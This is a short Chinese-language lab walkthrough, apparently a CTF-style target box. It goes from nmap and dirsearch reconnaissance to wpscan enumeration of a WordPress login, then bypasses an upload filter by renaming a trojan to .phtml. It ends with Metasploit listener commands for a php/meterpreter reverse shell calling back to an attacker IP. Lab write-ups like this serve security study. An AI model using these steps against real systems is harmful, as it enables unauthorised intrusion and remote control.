一、信息收集
步骤一:主机发现
nmap 192.168.7.0/24
步骤二:端口扫描
nmap -p- 192.168.7.180
步骤三:访问80端口:
步骤四、目录扫描:
没有有用的信息。
步骤五、返回首页,翻译一下看到一个新的路径:
首页没有看到有用的功能点。
步骤六、扫描一下这个目录:
dirsearch -u http://192.168.7.180/g@web
步骤七、拼接访问只找到一个登录框:
步骤八、属于wordpress框架使用wpscan枚举用户名:
步骤九、访问wpscan查出来的网页:
找到一个密码,尝试登录没有结果。
步骤十、使用wpscan进行漏洞扫描:
发现有一个RCE漏洞。
步骤十一、访问这个网站,修改poc保存为一个html文件:
二、GetShell
步骤十二、使用kali生成一个反弹shell的木马文件:
步骤十三、上传木马文件,发现提示后缀名不对:
步骤十四、修改后缀名为.phtml,再次上传:
显示上传成功
步骤十五、打开msf反弹shell:
####开启监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.7.135
set LPORT 6666
exploit
步骤十六、访问上传的文件:
步骤十七、点击文件进行反弹: